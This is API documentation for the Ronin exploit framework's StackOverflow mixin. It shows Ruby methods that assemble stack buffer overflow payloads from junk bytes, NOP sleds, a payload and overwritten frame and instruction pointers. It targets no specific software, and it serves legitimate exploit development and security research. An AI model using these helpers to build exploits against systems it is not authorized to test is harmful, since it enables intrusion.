Module: Ronin::Exploits::Mixins::StackOverflow
- Included in:
- StackOverflow
- Defined in:
- lib/ronin/exploits/mixins/stack_overflow.rb
Overview
Methods for building Stack Overflow buffers.
Example
include Mixins::StackOverflow
def build
ebp = 0x06eb9090
eip = 0x1001ae86
buffer = buffer_overflow(length: 1024, nops: 16, payload: payload, bp: ebp, ip: eip)
# ...
end
If you want more control over how the buffer is constructed:
include Mixins::StackOverflow
def build
ebp = 0x06eb9090
eip = 0x1001ae86
buffer = junk(1024) + nops(16) + payload + stack_frame(ebp,eip)
# ...
end
Constant Summary
Constants included from NOPS
Instance Method Summary collapse
-
#buffer_overflow(length:, nops: nil, payload:, bp:, ip:) ⇒ String
Builds the stack overflow buffer containing the payload, nops, and a stack frame.
-
#stack_frame(bp, ip) ⇒ String
Creates a new stack frame.
Methods included from Text
Methods included from NOPS
#nop, #nops, #perform_validate
Methods included from Binary
#pack, #perform_validate, #platform
Instance Method Details
#buffer_overflow(length:, nops: nil, payload:, bp:, ip:) ⇒ String
Builds the stack overflow buffer containing the payload, nops, and a stack frame.
109 110 111 112 113 114 115 116 117 118 119 120 121 |
# File 'lib/ronin/exploits/mixins/stack_overflow.rb', line 109 def buffer_overflow(length: , nops: nil, payload: , bp: , ip: ) payload = payload.to_s payload = self.nops(nops) + payload if nops stack_frame = self.stack_frame(bp,ip) buffer = String.new(encoding: Encoding::ASCII_8BIT) buffer << junk(length - payload.bytesize - stack_frame.bytesize) buffer << payload buffer << stack_frame return buffer end |
#stack_frame(bp, ip) ⇒ String
Creates a new stack frame.
77 78 79 |
# File 'lib/ronin/exploits/mixins/stack_overflow.rb', line 77 def stack_frame(bp,ip) pack(:machine_word,bp) + pack(:machine_word,ip) end |